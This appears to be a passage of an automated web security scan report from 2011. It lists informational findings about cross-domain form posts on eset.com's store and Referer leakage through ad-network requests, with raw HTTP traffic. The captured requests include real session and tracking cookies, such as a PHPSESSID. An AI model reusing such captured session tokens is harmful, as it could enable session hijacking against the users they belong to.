Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
</div>
<form id="ns_form_6" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

21.10. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_4" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

21.11. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div>
<form id="ns_form_5" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

22. Cross-domain Referer leakage  previous  next
There are 63 instances of this issue:


22.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
MlV2Ykc5bloyVmtiM1YwcUFNQjZBUDRBX1VEQ0FDQWhPQUVBWUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR4bXE4blczQ0dmSjhSUW5lbTlWZS1HbjZQc19nJmNsaWVudD1jYS1wdWItNDQ1NjE4MjEzNTk1Njk3NCZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1043494379" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

22.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=71518370253033940&clkurl=http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU./referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUlAz8J7YZQuuVKsw_ef0aAc0zrdADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34v16vZuOQ6smNO4ZRLcruOUy7C6xpOOb8JITjlXBs4oHJtQHd.B7rTBebODgn32zj1Sdhp49LXfnLnJlz62k_OqMUpd0J4MU65Ywse4ZQ7.lUQp9yMBey45WxbccpNf.iJW65jJW45U12cctNuKuKUqyzzBYY7I275biGgPIPvlp0NDBzAhLSTkZGRgSHwFiMzkGIwYGIQBvEVzMDCSwvAwiyZjGxAQZYQJjZGdiBDfhcTAzdIGTQNggxkAAAFopIm; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:23:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3734
Date: Mon, 25 Apr 2011 14:23:13 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
Z0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=499353087" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

22.3. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /code/57617?rnd=281388&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html%3F14857%231&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html?14857
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:32:04 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:04 GMT
Expires: Mon, 25 Apr 2011 14:32:04 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:32:04 GMT
Content-Length: 6529

var y5_sLinkHead = 'http://an.yandex.ru/count/6c8D5kaQUsO40000ZhHUMDi4XP4H3f6nxk6s0PDKfC00040C27a3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if (win
...[SNIP]...
</span>','=fWlZM9K2cm5kGpa1YPyID9YD79ol96Arcgx8GZIIf8FR7PsJZWAFhnEXOf-tLbB-3vbfe91n0gU04q5_1W00','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=s3ihHfK2cmHhK3i1agPnRWoFll97v0AVjn3RzWMam00000m8U0G0'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/news.html%3F14857%231&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...

22.4. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:09 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:09 GMT
Expires: Mon, 25 Apr 2011 14:20:09 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:09 GMT
Content-Length: 6626

var y5_sLinkHead = 'http://an.yandex.ru/count/J9i6sP-l6Xu40000ZhanMDi4XP4H3fQl8qgkaQbw69MJLAJE000030Xz0m00';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
</span>','=FiNnVvK2cm5kGpa1YQHnPpAOM9ouVOzJ0PgeI45PagCd7nkTer610O-xcdbd19-o2bGc39aEe91n0gU4U45w1m00','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=J1j5YPK2cmHhK3i1cfBX59AcSMuCZxvQBdC1dx8uiR4FfC00000C27m4'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/news.html&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...

22.5. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /code/57617?rnd=309442&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2F&grab=dNCf0L7QuNGB0LrQvtCy0LDRjyDRgdC40YHRgtC10LzQsCBXZWJhbHRh HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
